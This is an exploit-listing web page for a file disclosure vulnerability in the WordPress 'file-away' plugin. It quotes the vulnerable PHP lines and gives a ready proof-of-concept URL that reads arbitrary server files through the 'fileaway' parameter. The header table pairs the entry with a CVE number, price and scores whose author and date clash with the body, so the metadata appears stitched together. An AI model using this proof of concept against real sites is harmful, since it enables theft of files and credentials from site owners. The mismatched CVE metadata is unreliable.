Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-12800 | CWE-200 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-07-09 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N | 0.74 | 0.99964 |
Title: wordpress file-away plugin - File Disclosure Author: Abolfazl Hajizade Vendor: https://wordpress.org/plugins/file-away/ Version: 3.9.6.1 Date: 7.7.2018 tested on: Windows-linux Vulnerable page: /file-away/lib/cls/class.fileaway_downloader.php Vulnerable Source: line 16: $file = $this->decrypt($_GET['fileaway']); line 35: $file = fopen($file, 'rb'); line 40: fread($file, 1024 * 8)) POC: http://site.com/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=path_file ============================================= WebSite : UltraSec.Org Channel : @UltraSecurity Email : [email protected] Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.